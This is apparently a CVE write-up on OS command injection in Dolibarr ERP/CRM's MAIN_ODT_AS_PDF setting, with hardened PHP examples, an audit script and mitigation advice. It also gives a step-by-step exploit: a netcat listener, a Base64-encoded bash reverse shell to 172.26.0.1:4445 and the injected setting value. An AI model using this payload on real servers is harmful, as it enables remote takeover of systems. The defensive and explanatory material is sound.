How this CVE Works
The vulnerability arises from improper handling of a configuration constant during the ODT to PDF conversion process. When an administrator triggers a document conversion (e.g., for a proposal or invoice), the system builds a shell command by directly concatenating the `MAIN_ODT_AS_PDF` constant with a sanitized filename. The vulnerable code resides in `htdocs/includes/odtphp/odf.php` at approximately line 930, where it executes:
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
While the `$name` variable is passed through escapeshellcmd(), the `MAIN_ODT_AS_PDF` constant is read straight from the database (via getDolGlobalString()) without any validation or sanitization. Because the constant forms the first token of the command line, escaping `$name` does nothing to contain it: an authenticated administrator who can edit the constant can inject arbitrary shell syntax.
An attacker can use command separators, such as a semicolon (;), to append arbitrary commands after the legitimate converter path. For example, setting `MAIN_ODT_AS_PDF` to `jodconverter; malicious_command` causes the shell to execute `jodconverter` first and then the injected malicious_command.
To avoid problems with special characters such as `&` or `>` in the stored constant, the attacker can encode the malicious command in Base64 so that the value only needs to carry alphanumerics, `;`, `|` and spaces. The payload can be structured as:
jodconverter; echo <base64_payload> | base64 -d | bash
This decodes and executes the Base64-encoded command; with a reverse shell payload, the attacker obtains a shell with the privileges of the web server user (typically www-data).
The attack is triggered whenever a document is generated using an ODT template, such as by navigating to `Commerce -> New proposal` and clicking Generate. The injected command runs on the server, leading to full remote code execution.
The vulnerability affects Dolibarr ERP/CRM versions prior to 23.0.0. It was fixed in version 23.0.0, released on February 28, 2026, by implementing proper sanitization of the `MAIN_ODT_AS_PDF` constant.
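To make the mechanism concrete, here is an added PHP illustration (not Dolibarr's code and not the 23.0.0 fix) that places the vulnerable concatenation pattern next to one way of hardening it. The function names, the allow-list of converter paths and the sample malicious setting are assumptions made for this example.

```php
<?php
// Added illustration, not Dolibarr's code: the vulnerable concatenation pattern
// next to a hardened construction.  Function names and the converter allow-list
// are assumptions made for this example.
declare(strict_types=1);

/** Mirrors the vulnerable pattern: setting . ' ' . escapeshellcmd($name). */
function buildConvertCommandVulnerable(string $converterSetting, string $name): string
{
    // escapeshellcmd() neutralises metacharacters in $name only; whatever the
    // administrator stored in the setting is handed to the shell verbatim.
    return $converterSetting . ' ' . escapeshellcmd($name);
}

/**
 * Hardened variant.  The setting must be a bare path token and must appear on
 * an explicit allow-list; every argument is quoted with escapeshellarg(), so a
 * separator anywhere in the inputs can no longer start a second command.
 * Returns null when the setting is rejected.
 */
function buildConvertCommandHardened(string $converterSetting, string $name, array $allowedConverters): ?string
{
    if (!preg_match('/^[A-Za-z0-9_.\/-]+$/', $converterSetting)) {
        return null;                       // ';', '|', '$(' etc. never reach the shell
    }
    if (!in_array($converterSetting, $allowedConverters, true)) {
        return null;                       // unknown binary, even if it looks like a path
    }
    return escapeshellarg($converterSetting) . ' ' . escapeshellarg($name);
}

// --- demonstration with a constructed malicious setting ("id", base64-encoded) ---
$malicious = 'jodconverter; echo aWQ= | base64 -d | bash';
$allowed   = ['/usr/bin/jodconverter', '/usr/bin/soffice'];
$file      = 'proposal.odt';

// The vulnerable builder happily emits two commands separated by ';'.
echo 'vulnerable: ', buildConvertCommandVulnerable($malicious, $file), PHP_EOL;
// The hardened builder rejects the same setting (NULL) ...
echo 'hardened  : ', var_export(buildConvertCommandHardened($malicious, $file, $allowed), true), PHP_EOL;
// ... and accepts only an allow-listed converter, with both tokens quoted.
echo 'hardened  : ', buildConvertCommandHardened('/usr/bin/jodconverter', $file, $allowed), PHP_EOL;
```

The allow-list matters more than the quoting: even a metacharacter-free value still names the program that will run as www-data. On PHP 7.4 and later, proc_open() also accepts the command as an array of arguments, which runs the program without a shell at all and removes the separator problem entirely; the allow-list check remains worthwhile for the same reason.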
dailycve form
Platform: Dolibarr ERP/CRM
Version: < 23.0.0
Vulnerability: OS Command Injection
Severity: Critical (CVSS: 9.4)
Date: 2026-04-17
Fixed: 2026-02-28 (v23.0.0)
What Undercode Says
The vulnerability stems from a classic case of insufficient input sanitization leading to OS command injection. Below are related Bash commands and analysis snippets.
Analyzing the vulnerable code snippet:
# Simulate the vulnerable command construction
MAIN_ODT_AS_PDF="jodconverter"
name="document.odt"
command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")"   # printf %q stands in for escapeshellcmd()
echo "Command: $command"
# Command: jodconverter document.odt
Testing command injection with a payload:
# Simulate injection using a command separator
MAIN_ODT_AS_PDF="jodconverter; id"
name="document.odt"
command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")"
echo "Command: $command"
# Command: jodconverter; id document.odt
# Handed to a shell, 'jodconverter' runs first and 'id document.odt' runs as a second command
Base64 encoding a reverse shell payload:
# Reverse shell command: bash -i >& /dev/tcp/172.26.0.1/4445 0>&1
# (172.26.0.1:4445 is the attacker's listener in this write-up)
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
# Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
Decoding and executing the payload (as the attacker would):
# Decode and execute the base64 payload
echo "YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK" | base64 -d | bash
Exploit
Prerequisites:
- Login as an Administrator in Dolibarr.
- Ensure the “Commercial Proposals” module is enabled with “ODT templates” activated.
Steps to reproduce a reverse shell:
1. Start a netcat listener on the attacker's machine (172.26.0.1 in this write-up):
nc -lvnp 4445
2. Encode the reverse shell command in Base64:
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
Output: `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK`
3. Navigate to `Home -> Setup -> Other Setup` in the Dolibarr admin panel.
4. Set the `MAIN_ODT_AS_PDF` constant to the following payload:
jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
5. Trigger the exploit by navigating to `Commerce -> New proposal`, creating a draft, selecting an ODT template (e.g., `generic_proposal_odt`), and clicking Generate.
6. Check the netcat listener: a reverse shell connection will be established, granting access to the server as the web server user.
Protection from this CVE
- Upgrade to Dolibarr version 23.0.0 or later. This version includes a fix that properly sanitizes the `MAIN_ODT_AS_PDF` configuration constant, preventing command injection.
- If a full upgrade is not immediately possible, backport the change from the 23.0.0 release that sanitizes the converter command construction in `htdocs/includes/odtphp/odf.php`, and re-check the stored value of `MAIN_ODT_AS_PDF` for anything other than a converter path.
- Restrict administrative privileges to only trusted users. Since exploitation requires authenticated admin access, minimizing the number of admins reduces risk.
- Monitor and validate configuration constants that are used in shell commands. Treat values that reach `exec()` as untrusted even when only administrators can set them; an allow-list of executable paths is safer than escaping, because the constant names the program that will run.
- Implement network segmentation to limit the impact of a compromised web server. For example, isolate the web server from critical internal systems.
- Use a Web Application Firewall (WAF) to detect and block common command injection patterns, such as command separators (`;`, `&&`, `|`) in configuration inputs. Treat this as defence in depth only: the payload is submitted by an authenticated administrator through the normal setup form, and the Base64 technique above leaves little for a pattern match to catch.
- Regularly audit and review code for dangerous functions like `exec()`, `system()`, and `shell_exec()` to ensure proper input sanitization.
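The auditing advice above can be turned into a small sweep. The following is an added PHP example, not part of Dolibarr, that examines stored constant values for injection indicators and decodes any embedded Base64 so a hidden payload becomes readable. The rows are constructed sample data shaped like Dolibarr's `llx_const` table (`name`, `value`); in a real audit they would come from a query such as `SELECT name, value FROM llx_const WHERE name = 'MAIN_ODT_AS_PDF'`.

```php
<?php
// Added example, not part of Dolibarr: sweep configuration constants that are
// interpolated into shell commands and report injection indicators.  The rows
// below are constructed sample data shaped like Dolibarr's llx_const table
// (name, value); in a real audit they would come from a database query.
declare(strict_types=1);

/** Returns human-readable findings for one constant; an empty array means clean. */
function auditShellConstant(string $name, string $value): array
{
    $findings = [];

    // Command separators, pipes, redirections and substitutions have no place
    // in a converter path.
    if (preg_match('/[;&|`$(){}<>\r\n]/', $value)) {
        $findings[] = "$name contains shell metacharacters";
    }

    // Decode any base64-looking token (>= 16 chars, whole groups of 4) so a
    // hidden payload such as "echo <b64> | base64 -d | bash" is shown in clear.
    if (preg_match_all('/[A-Za-z0-9+\/]{16,}={0,2}/', $value, $m)) {
        foreach ($m[0] as $token) {
            if (strlen($token) % 4 !== 0) {
                continue;
            }
            $decoded = base64_decode($token, true);
            // Only report decodes that are printable text; random path bytes
            // that happen to look like base64 decode to binary garbage.
            if ($decoded !== false && preg_match('/^[\x20-\x7e\t\r\n]+$/', $decoded)) {
                $findings[] = "$name embeds base64 that decodes to: " . trim($decoded);
            }
        }
    }

    // Anything beyond a bare path or program name deserves a manual look.
    if ($value !== '' && !preg_match('/^[A-Za-z0-9_.\/-]+$/', $value)) {
        $findings[] = "$name is not a plain executable path";
    }

    return $findings;
}

// Constructed sample rows: one clean setting and one carrying the payload
// from the write-up above.
$rows = [
    ['name' => 'MAIN_ODT_AS_PDF', 'value' => '/usr/bin/jodconverter'],
    ['name' => 'MAIN_ODT_AS_PDF', 'value' => 'jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash'],
];

foreach ($rows as $row) {
    $findings = auditShellConstant($row['name'], $row['value']);
    printf("%-16s %s\n", $row['name'], $findings ? 'SUSPICIOUS' : 'ok');
    foreach ($findings as $f) {
        echo "    - $f\n";
    }
}
```

The clean row produces no findings, while the injected row is flagged three times, including the decoded reverse shell command. The same check is worth scheduling against every constant that Dolibarr feeds to `exec()`, not only `MAIN_ODT_AS_PDF`, since an attacker who has already reached the setup page can edit any of them.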
Impact
Successful exploitation results in Remote Code Execution (RCE) with the privileges of the web server user (typically www-data). This can lead to:
– Full system compromise: The attacker can execute arbitrary commands, potentially gaining persistent access to the server.
– Data breach: Sensitive configuration files (e.g., database credentials) can be read, leading to further data exfiltration or unauthorized access to other systems.
– Lateral movement: The compromised server can be used as a pivot point to attack other internal hosts, depending on network segmentation.
– Service disruption: The attacker could modify or delete application code, disrupt business operations, or deploy ransomware.
– Privilege escalation: If the web server user has additional privileges (e.g., sudo permissions or access to Docker sockets), the attacker may escalate to root or escape containers.
The CVSS 4.0 base score for this vulnerability is 9.4 (Critical), reflecting the high impact on confidentiality, integrity, and availability, along with the ease of exploitation given administrative access.
Sources:
Reported By: github.com

